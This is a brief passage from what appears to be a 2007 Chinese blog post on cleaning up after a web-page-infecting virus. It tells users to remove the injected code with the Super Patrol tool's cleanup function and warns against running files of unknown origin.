          2、对于网页被感染的用户,可以使用超级巡警的垃圾清理功能来批量修复被感染的网页,具体功能垃圾清理→智能扫描→清除指定代码,勾选后填入病毒植入的恶意网页,点击扫描→清除即可。
          3、不要运行来历不明的文件。

- 作者: fengrenzhe 2007年09月3日, 星期一 09:51  回复(0) |  引用(0) 加入博采